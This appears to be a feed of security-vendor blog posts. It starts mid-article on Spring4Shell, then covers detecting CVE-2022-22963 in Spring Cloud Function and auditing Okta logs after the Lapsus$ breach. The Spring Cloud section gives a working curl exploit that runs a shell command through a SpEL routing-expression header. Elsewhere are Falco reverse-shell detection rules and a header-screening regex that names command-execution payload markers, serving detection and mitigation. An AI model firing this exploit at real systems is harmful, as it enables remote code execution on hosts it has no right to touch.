Creating and assigning a policy for this specific CVE-2022-22965, the admission controller will evaluate new deployment images, blocking deployment if this security issue is detected.

To detect at runtime with Falco, here is a reverse shell rule example. To avoid false positives, you can add exceptions in the condition to better adapt to your environment.

- rule: Reverse shell
  desc: Detect reverse shell established remote connection
  condition: evt.type=dup and container and fd.num in (0, 1, 2) and fd.type in ("ipv4", "ipv6")
  output: >
    Reverse shell connection (user=%user.name %container.info process=%proc.name parent=%proc.pname cmdline=%proc.cmdline terminal=%proc.tty container_id=%container.id image=%container.image.repository fd.name=%fd.name fd.num=%fd.num fd.type=%fd.type fd.sip=%fd.sip)
  priority: WARNING
  tags: [container, shell, mitre_execution]
  append: false
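For readers less familiar with Falco syntax, here is a rough Python equivalent of the rule's condition. It is a sketch for reasoning about the logic only, not a replacement for Falco. The event is modeled as a flat dictionary keyed by Falco field names, which is an assumption made for the example, and the container check mirrors the usual definition of the container macro (container.id != host).

```python
STD_FDS = {0, 1, 2}                  # stdin, stdout, stderr
NETWORK_FD_TYPES = {"ipv4", "ipv6"}  # the descriptor is a network socket


def looks_like_reverse_shell(event):
    """Mirror the rule: a standard stream is duplicated onto a network socket."""
    return (
        event.get("evt.type") == "dup"
        and event.get("container.id", "host") != "host"
        and event.get("fd.num") in STD_FDS
        and event.get("fd.type") in NETWORK_FD_TYPES
    )


# Hypothetical event values for illustration.
suspicious = {"evt.type": "dup", "container.id": "8ed46a770162", "fd.num": 0, "fd.type": "ipv4"}
benign = {"evt.type": "dup", "container.id": "8ed46a770162", "fd.num": 5, "fd.type": "file"}

print(looks_like_reverse_shell(suspicious))  # True
print(looks_like_reverse_shell(benign))      # False
```

The rule works because a reverse shell typically redirects the standard streams of a shell process to a network connection, which legitimate workloads rarely do.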

Conclusion

This week is another reminder of how easily we can be vulnerable at all times, like what happened with Log4j. In this case, Java is affected; more specifically:

CVE-2022-22963: Spring Cloud Function
CVE-2022-22965: Spring Framework

To be safe, use scanners to find out whether you are affected, and patch to the latest version to mitigate the vulnerabilities. Similarly, take the necessary measures to check that everything is correct at deployment time, and never stop monitoring your infrastructure and applications at runtime.

We will keep the blog updated in case of significant changes.

The post Critical Vulnerability in Spring Core: CVE-2022-22965 a.k.a. Spring4Shell appeared first on Sysdig.

Detecting and Mitigating CVE-2022-22963: Spring Cloud RCE Vulnerability

Stefano Chierici — Thu, 31 Mar 2022 02:02:21 +0000

Today, researchers found a new critical vulnerability in the popular Spring Cloud Function project that leads to remote code execution (RCE). The vulnerability, CVE-2022-22963, permits attackers to execute arbitrary code on the machine and compromise the entire host.

After CVE-2022-22963, the new CVE-2022-22965 has been published. The new critical vulnerability affects Spring Framework and also allows remote code execution.
This article was updated on 2022-04-02.

The Spring Cloud Function versions impacted are the following:

3.1.6
3.2.2
Older, unsupported versions

Using the routing functionality, a user can provide a specially crafted Spring Expression Language (SpEL) expression as a routing-expression to access local resources and execute commands on the host.

Since Spring Cloud Function can be used in Cloud serverless functions, like AWS Lambda or Google Cloud Functions, those functions might be impacted as well.

This is the second critical vulnerability discovered in the last few months, after the Log4Shell remote code execution vulnerability was found in the Log4j Java library.

In this article, you’ll learn what CVE-2022-22963 is, how it can be exploited, and how to mitigate it using Sysdig.

Editor’s note: There are two vulnerabilities in Spring, both of which are being labeled Spring4Shell. The following discussion regards the vulnerability affecting Spring Cloud Function, which permits Spring Expression Language injection, not the vulnerability in Spring Core.

What is Spring Cloud Function

Spring is a lightweight, open source application development framework for the Java platform. Millions of developers use Spring Framework to create high-performing, easily testable code.

For this vulnerability in particular, we are going to look at the Spring Cloud Function framework. It allows developers to write cloud-agnostic functions using Spring features. These functions can be stand-alone classes, and one can easily deploy them on any cloud platform to build a serverless framework.

The major advantage of Spring Cloud Function is that it provides all the features of Spring Boot, like autoconfiguration and dependency injection.

Let’s now see where the issue behind CVE-2022-22963 lies.

The CVE-2022-22963 issue

The issue with CVE-2022-22963 is that a SpEL expression supplied in the spring.cloud.function.routing-expression HTTP request header is injected and executed through StandardEvaluationContext.

As we can see from the patch, a new flag isViaHeader was added to perform the validation before parsing the header content. This suggests that the vulnerability is limited to an HTTP attack path.

We can also see how it worked before the patch: the header value was used prior to any validation.
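
Because the attack path is a single HTTP header, request logs or a proxy layer can be screened for it. The following is a heuristic sketch only: the function name and the marker list are assumptions rather than a vetted signature, and a determined attacker may be able to evade simple pattern matching.

```python
import re

ROUTING_HEADER = "spring.cloud.function.routing-expression"

# Heuristic markers: SpEL type references such as T(java.lang.Runtime)
# and a few names commonly seen in command-execution payloads.
SUSPICIOUS = re.compile(r"\bT\s*\(|getRuntime|ProcessBuilder|\.exec\s*\(")


def is_suspicious_request(headers):
    """Flag a request whose routing-expression header looks like SpEL injection."""
    for name, value in headers.items():
        # HTTP header names are case-insensitive.
        if name.lower() == ROUTING_HEADER and SUSPICIOUS.search(value):
            return True
    return False


request_headers = {
    "Host": "192.168.1.2:8080",
    "spring.cloud.function.routing-expression":
        'T(java.lang.Runtime).getRuntime().exec("touch /tmp/test")',
}
print(is_suspicious_request(request_headers))  # True
```

A check like this is a triage aid for logs, not a replacement for patching.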

The impact of CVE-2022-22963

According to the CVSS v3 system, it scores 9.8, which is CRITICAL severity.

To learn more about how a vulnerability score is calculated, see Are Vulnerability Scores Tricking You? Understanding the severity of CVSS and using them effectively.
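
As a quick reference, the CVSS v3.x qualitative severity scale can be written as a small lookup. The function name is ours; the score bands follow the v3.x rating scale. Note that under v3.x a 9.8 falls in the Critical band, whereas the older v2 scale tops out at High.

```python
def cvss_v3_rating(score):
    """Map a CVSS v3.x base score (0.0 to 10.0) to its qualitative rating."""
    if not 0.0 <= score <= 10.0:
        raise ValueError(f"score out of range: {score}")
    if score == 0.0:
        return "None"
    if score <= 3.9:
        return "Low"
    if score <= 6.9:
        return "Medium"
    if score <= 8.9:
        return "High"
    return "Critical"


print(cvss_v3_rating(9.8))  # Critical
```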

The high impacts on confidentiality, integrity, and availability, as well as the ease of exploitation, make this really critical for all users adopting this solution.

By exploiting this vulnerability, an attacker can execute arbitrary commands and fully compromise the host or container.

Since Spring Cloud Function might be used in cloud serverless functions, those functions might be vulnerable in the same way, giving attackers a way into your cloud account.

How to exploit CVE-2022-22963

Exploiting the vulnerability is quite easy to accomplish. In our GitHub, you can find the images to run and try the exploitation. Here is the reported curl command to exploit the vulnerability.

curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter'

With this curl command, it’s trivial to create a file on the operating system, but the same technique could be used to open a reverse shell on the vulnerable host or container.

How to detect and mitigate CVE-2022-22963

If you’re impacted by CVE-2022-22963, you should update the application to the newest versions 3.1.7 & 3.2.3.

Even if you have already upgraded your library or applied one of the other mitigations on containers affected by the vulnerability, you still need to detect any exploitation attempts and post-breach activities in your environment.

You can detect this vulnerability at three different phases of the application lifecycle:

Build process: With an image scanner.
Deployment process: Thanks to an image scanner on the admission controller.
Runtime detection phase using a runtime detection engine: Detect malicious behaviors in already deployed hosts or pods.

Let’s now dig deeper into each of them.

1. Build: Image Scanner

Using an image scanner, a software composition analysis (SCA) tool, you can analyze the contents and the build process of a container image in order to detect security issues, vulnerabilities, or bad practices.

In the report results, you can check whether the specific CVE has been detected in any images already deployed in your environment.

We can see that CVE-2022-22963 affects one specific image which uses a vulnerable version.

At the time of the writing of this article, multiple vulnerability-tracking databases were not yet updated to reflect the severity of this vulnerability. As a stopgap solution, pictured below, you can also blacklist vulnerable versions of affected packages. Pictured is a “warn” policy, which will not stop the execution of a vulnerable image.
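
The stopgap idea can be sketched as a simple package blocklist evaluated against an image's package inventory. Everything here is illustrative: the artifact name, the data shapes, and the `evaluate_image` helper are assumptions, not the scanner's actual policy format.

```python
# Hypothetical blocklist: package name -> exact versions to flag.
BLOCKLIST = {"spring-cloud-function-context": {"3.1.6", "3.2.2"}}


def evaluate_image(packages, action="warn"):
    """Return (decision, findings) for a list of (name, version) pairs.

    decision is "pass" when nothing matches; otherwise it is the configured
    action: "warn" lets the image run, "stop" would block it.
    """
    findings = [
        (name, version)
        for name, version in packages
        if version in BLOCKLIST.get(name, set())
    ]
    return ("pass" if not findings else action, findings)


inventory = [
    ("spring-cloud-function-context", "3.2.2"),
    ("jackson-databind", "2.13.2"),
]
print(evaluate_image(inventory))
```

Matching on name and version does not depend on the vulnerability feed, which is the point of the stopgap while feeds catch up.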

2. Deploy: Image scanner on admission controller

By implementing image scanning on the admission controller, you can admit only the workload images that comply with the scanning policy to run in the cluster.

This component can reject images based on different criteria, such as names, tags, namespaces, and CVE severity level.

Once you create and assign a policy for CVE-2022-22963, the admission controller evaluates new deployment images and blocks the deployment if this security issue is detected.

Again, in the event of an incomplete vulnerability feed, you can block images containing specific package names and versions.
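
The admission decision described in this section can be pictured with a small sketch. The `ScanResult` and `Policy` types and the `admit` function are hypothetical stand-ins for whatever your admission controller and scanner expose; only the decision logic is the point.

```python
from dataclasses import dataclass, field


@dataclass
class ScanResult:
    image: str
    cves: set = field(default_factory=set)  # CVE IDs the scanner reported


@dataclass
class Policy:
    blocked_cves: set
    exempt_namespaces: set = field(default_factory=set)


def admit(scan, namespace, policy):
    """Return (allowed, reason) for deploying the scanned image into a namespace."""
    if namespace in policy.exempt_namespaces:
        return True, "namespace exempt"
    hits = sorted(scan.cves & policy.blocked_cves)
    if hits:
        return False, "blocked: " + ", ".join(hits)
    return True, "compliant"


policy = Policy(blocked_cves={"CVE-2022-22963"})
scan = ScanResult(image="registry.example/app:1.0", cves={"CVE-2022-22963"})
print(admit(scan, "production", policy))  # (False, 'blocked: CVE-2022-22963')
```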

3. Runtime Response: Event Detection

Using a runtime detection engine like Falco, you can detect attacks that occur at runtime, when your containers are already in production.

Here is a reverse shell rule example. To avoid false positives, you can add exceptions in the condition to better adapt to your environment.

- rule: Reverse shell
  desc: Detect reverse shell established remote connection
  condition: evt.type=dup and container and fd.num in (0, 1, 2) and fd.type in ("ipv4", "ipv6")
  output: >
    Reverse shell connection (user=%user.name %container.info process=%proc.name parent=%proc.pname cmdline=%proc.cmdline terminal=%proc.tty container_id=%container.id image=%container.image.repository fd.name=%fd.name fd.num=%fd.num fd.type=%fd.type fd.sip=%fd.sip)
  priority: WARNING
  tags: [container, shell, mitre_execution]
  append: false

Conclusion

The Spring Cloud Function vulnerability is another in a series of major Java vulnerabilities. Much like Log4j, it only requires an attacker to be able to send the malicious string to the Java app’s HTTP service. CVE-2022-22963 has a very low bar for exploitation, so we should expect to see attackers heavily scanning the internet. Once they find vulnerable hosts, they will likely install crypto miners, botnet agents, or their remote access toolkits.

The best defense for this type of vulnerability is to patch it as soon as possible. Having a clear understanding of the packages being used in your environment is a must in today’s world. Using modern tools, such as SCA, can help accomplish this goal and prioritize systems appropriately.

The post Detecting and Mitigating CVE-2022-22963: Spring Cloud RCE Vulnerability appeared first on Sysdig.

Detect malicious activity in Okta logs with Falco and Sysdig okta-analyzer

Stefano Chierici — Fri, 25 Mar 2022 18:13:47 +0000

On March 22, the hacking group Lapsus$ published a Twitter post with a number of screenshots taken from a computer showing “superuser/admin” access to various systems at authentication firm Okta that took place in January this year.

Okta is the #1 platform in the Identity-as-a-Service (IDaaS) category, which means that it manages access to internal and external systems with one login.

Thousands of organizations and governments worldwide use Okta as the gatekeeper to their SaaS environment and cloud services. This episode demonstrates the importance of insider attacks, as well as others like phishing, credential stuffing, and password spraying, to which we can all potentially fall victim, directly or through the ramifications of another compromise.

In this article, we are going to see how it’s possible to analyze and audit current and past logs using Falco and Sysdig okta-analyzer.

Who is DEV-0537, aka the Lapsus$ group?

Apart from this latest breach, we don’t know much about the threat actor DEV-0537, aka the Lapsus$ group. What we do know is that it’s a very recent group operating out of South America that has been active since at least December 2021 and has claimed a number of victims in recent months.

Their main targets are usually large organizations, from which they steal data and extort payments. Victims range from government institutions, like the Brazilian Ministry of Health, to technology and gaming companies like Microsoft, Nvidia, Ubisoft, and Samsung. Okta is the latest addition to this list.

Not much else is known about Lapsus$ itself, other than that unlike ransomware gangs, which use dark web websites to publish stolen data, Lapsus$ uses a Telegram channel to share information about its attacks – and information stolen from its victims – directly with anyone who is subscribed to it.

Okta data breach – What happened?

The hacker group Lapsus$ posted the following message on its Telegram channel, with screenshots showing Superadmin access to okta.com. Judging by the date visible on the screen, the breach seems to have occurred at the end of January 2022, raising many concerns.

After some investigations conducted by Okta, Okta’s CEO Todd McKinnon confirmed an event in January in their official statement.

In addition to the official statement, Okta published a timeline of the incident, which took place from January 16 to January 21, when the threat actor had access to the Sitel environment.

Using the Telegram channel, the hacker group disputed the official investigation statement published by Okta, leaving many to wonder why Okta didn’t report the breach earlier, what the real impact was, and which customers were involved.

Understanding the impact of the Okta breach

Estimating the real impacts of this breach is pretty hard and customers may want to conduct their own analysis.

Based on what Okta stated and reported, the maximum potential impact of the breach is 366 customers (approximately 2.5% of Okta’s customers) whose Okta tenant was accessed by Sitel. Affected customers will receive a report that shows the actions performed on their Okta tenant by Sitel during that period, so they can perform their own investigations.

On the other hand, Lapsus$ responded using the Telegram channel, stating that the potential impact to Okta customers is NOT limited, since resetting passwords and MFA would result in total account compromise.

What is certain is that checking the Okta logs from the past months for suspicious entries is a quick activity that could save Okta customers from unpleasant surprises in the future.

In this article, we are going to look at how you can audit the Okta logs easily, without needing to ingest all the logs into a single system.

Don’t panic, what can we do now

If you are an Okta customer, you may be wondering what you can do to assess what happened and whether something malicious is still happening in your environment.

Based on the information shared by Okta, there are some events we should monitor and assess in past logs to make sure nothing happened and nothing is happening. In particular, we suggest the following actions:

Enable MFA for all users. As we know, passwords alone aren’t enough to secure our accounts, and we need an additional level of protection.
Investigate the following events:
- Check all password and MFA changes in our Okta instances.
- Make sure that all the password resets are valid.
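
As a rough illustration of the checks above, the sketch below filters exported Okta System Log events for password and MFA changes inside a time window. The default window is the January 16 to January 21 timeline published by Okta; widen it to cover the past months. The event type names and the `eventType` / `published` field names are assumptions based on the Okta System Log format and should be verified against your own tenant's logs.

```python
from datetime import datetime, timezone

# Assumed Okta System Log event types for password and MFA changes.
WATCHED_TYPES = {
    "user.account.reset_password",
    "user.account.update_password",
    "user.mfa.factor.deactivate",
    "user.mfa.factor.reset_all",
}

WINDOW_START = datetime(2022, 1, 16, tzinfo=timezone.utc)
WINDOW_END = datetime(2022, 1, 22, tzinfo=timezone.utc)  # exclusive, covers all of January 21


def parse_published(value):
    """Parse an ISO 8601 timestamp such as '2022-01-20T18:30:00.000Z'."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def events_to_review(events, start=WINDOW_START, end=WINDOW_END):
    """Return watched events whose 'published' time falls within [start, end)."""
    selected = []
    for event in events:
        if event.get("eventType") not in WATCHED_TYPES:
            continue
        if start <= parse_published(event["published"]) < end:
            selected.append(event)
    return selected
```

Each returned event still needs a human decision: the goal is to confirm that every reset or MFA change was requested by its legitimate owner.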

It’s fundamental to check both past and current logs to be sure your environment is still safe and there is no suspicious activity. If any of these events triggers an alert, take action on the affected accounts; we also recommend that you initiate a deep investigation.

Sysdig can help you analyze and audit current logs using open source Falco, and past logs using Sysdig okta-analyzer, providing a solution for both cases.

Runtime detection with Falco

To address this new Okta challenge, we need a smart, ready-to-use tool that is capable of consuming a huge amount of Okta logs to assess whether something fishy is happening in our environment.

Falco has a great reputation as a tool for runtime security in Linux, Container, and Kubernetes environments. What we might not know yet is that Falco has recently extended its detection capabilities with the new Falco plugin framework, which allows us to create plugins for different data sources and use the usual Falco engine over those logs.

In response to this incident, the Falco Team has created a new plugin for Okta with which it’s possible to use Falco detection rules and get alerts over those suspicious events. Here is a quick example of how a Falco rule would detect and report MFA being removed from a user account.

- rule: removing MFA factor from user in OKTA
  desc: Detect a removing MFA activity on a user in OKTA
  condition: okta.evt.type = "user.mfa.factor.deactivate"
  output: "A user has removed MFA factor in the OKTA account (user=%okta.actor.name, ip=%okta.client.ip)"
  priority: NOTICE
  source: okta
  tags: [okta]

Many other ready-to-use rules, created by the Sysdig Threat Research team, are available to audit different types of security events. If you want to learn more about the Okta plugin, visit the blog post Analyze Okta Log Events with a Falco Plugin.

Sysdig okta-analyzer: Okta threat detection

Once we have the runtime detection part covered, we will want to quickly find out if we have been affected in the past by the Lapsus$ group.

Sysdig has released the following binaries that will allow us to collect Okta events from the date we choose. It should be noted that the data collection time will vary depending on the size of the company and how far back the chosen start date is.

Name	sha256
okta-analyzer-darwin-amd64	52e43994b12d790ce2a784f73a68984b8a554384962936eb8cbab5f551af396b
okta-analyzer-darwin-arm64	1a5957248dc4b665a9be7334d76a8cd0871a2da7aa86affd668512a5f547d2f2
okta-analyzer-linux-amd64	105e97b9bdc2cf6e5cb231bc0134548647a25d63c5a84a710718275d1392662b
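
Before running a downloaded binary, it is worth comparing its digest against the table above. This is a minimal sketch using Python's standard hashlib; the function names and the local file path in the usage line are assumptions.

```python
import hashlib

# Digests copied from the table above.
EXPECTED_SHA256 = {
    "okta-analyzer-darwin-amd64": "52e43994b12d790ce2a784f73a68984b8a554384962936eb8cbab5f551af396b",
    "okta-analyzer-darwin-arm64": "1a5957248dc4b665a9be7334d76a8cd0871a2da7aa86affd668512a5f547d2f2",
    "okta-analyzer-linux-amd64": "105e97b9bdc2cf6e5cb231bc0134548647a25d63c5a84a710718275d1392662b",
}


def sha256_of(path, chunk_size=1 << 20):
    """Compute the SHA-256 hex digest of a file, reading it in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_download(path, name):
    """True when the file at path hashes to the published digest for name."""
    return sha256_of(path) == EXPECTED_SHA256[name]
```

For example, `verify_download("./okta-analyzer-linux-amd64", "okta-analyzer-linux-amd64")` should return True for an untampered download of that binary.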

How to use okta-analyzer

To run okta-analyzer, follow these simple instructions. The only thing we need is the Okta API token. Here you can find the process to obtain it.

Usage:
  okta-analyzer [OPTIONS]
Application Options:
  -f, --file=   Okta Logs File
      --apikey= Okta API Key
      --url=    Okta API base url (e.g. "https://mycompany.okta.com")
Help Options:
  -h, --help    Show this help message

It can be used either with:

okta-analyzer -f

or with:

okta-analyzer --apikey $OKTA_API_KEY --url yourcompany.okta.com

Reporting for post-analysis

Once the tool is run, Okta logs are ingested and processed by the out-of-the-box (OOTB) Falco rules to detect suspicious events, and a PDF is generated with all the evidence for deeper analysis. This provides a quick overview of how much you may be affected.

Conclusion

No one is safe from being a target, and it is necessary to be aware that any software or service we use must be audited to shorten detection times. In addition, this incident has highlighted the importance of taking measures against insider threats and social engineering, since the human factor is, in the end, the weakest point in the chain.

Delegating part of your infrastructure might be crucial for your business. Actively keeping an eye on its behavior is too. We hope this threat is seen as a warning of the potential risk.

If you are concerned about this new threat, audit your Okta logs as soon as possible to detect if you are affected. In this article, we have offered you the steps to follow to make the process easier.

The post Detect malicious activity in Okta logs with Falco and Sysdig okta-analyzer appeared first on Sysdig.